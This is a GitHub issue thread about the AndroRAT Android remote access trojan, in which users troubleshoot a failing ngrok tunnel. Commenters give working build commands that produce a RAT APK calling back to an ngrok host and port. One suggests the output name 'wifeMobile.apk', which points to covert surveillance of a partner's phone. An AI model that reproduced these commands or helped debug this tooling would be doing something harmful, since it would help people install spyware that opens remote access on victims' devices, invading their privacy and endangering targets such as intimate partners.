### ISSUE TITLE
Pls help

### ISSUE THREAD

**Issue by vishram56** [karma9874/AndroRAT#171]
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/pyngrok/ngrok.py", line 440, in api_request
    response = urlopen(request, data, timeout)
  File "/usr/lib/python3.9/urllib/request.py", line 214, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.9/urllib/request.py", line 523, in open
    response = meth(req, response)
  File "/usr/lib/python3.9/urllib/request.py", line 632, in http_response
    response = self.parent.error(
  File "/usr/lib/python3.9/urllib/request.py", line 561, in error
    return self._call_chain(*args)
  File "/usr/lib/python3.9/urllib/request.py", line 494, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.9/urllib/request.py", line 641, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 502: Bad Gateway

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/root/AndroRAT/androRAT.py", line 48, in <module>
    tcp_tunnel = ngrok.connect(port, "tcp")
  File "/usr/local/lib/python3.9/dist-packages/pyngrok/ngrok.py", line 255, in connect
    tunnel = NgrokTunnel(api_request("{}/api/tunnels".format(api_url), method="POST", data=options,
  File "/usr/local/lib/python3.9/dist-packages/pyngrok/ngrok.py", line 461, in api_request
    raise PyngrokNgrokHTTPError("ngrok client exception, API returned {}: {}".format(status_code, response_data),
pyngrok.exception.PyngrokNgrokHTTPError: ngrok client exception, API returned 502: {"error_code":103,"status_code":502,"msg":"failed to start tunnel","details":{"err":"TCP tunnels are only available after you sign up.\nSign up at: https://dashboard.ngrok.com/signup\n\nIf you have already signed up, make sure your authtoken is installed.\nYour authtoken is available on your dashboard: https://dashboard.ngrok.com/get-started/your-authtoken\r\n\r\nERR_NGROK_302\r\n"}}

**Comment by schieferzahn** [comment]
i have the same problem

**Comment by schieferzahn** [comment]
It shows this Error when I build the apk like this.
python3 androRAT.py --build --ngrok -p 4444 -o plswork.apk

**Comment by rzgarespo** [comment]
free version of ngrok doesnt support tcp port 4444 only 80 i think. 
when you run ngrok in the terminal copy the value of "Forwarding" and use it in --build parameters. for example:
>ngrok
Forwarding                tcp://2.tcp.ngrok.io:11654 -> localhost: 4444

back to androRAT
>pthon3 androRAT.py --build -i 2.tcp.ngrok.io -p 11654 -o wifeMobile.apk
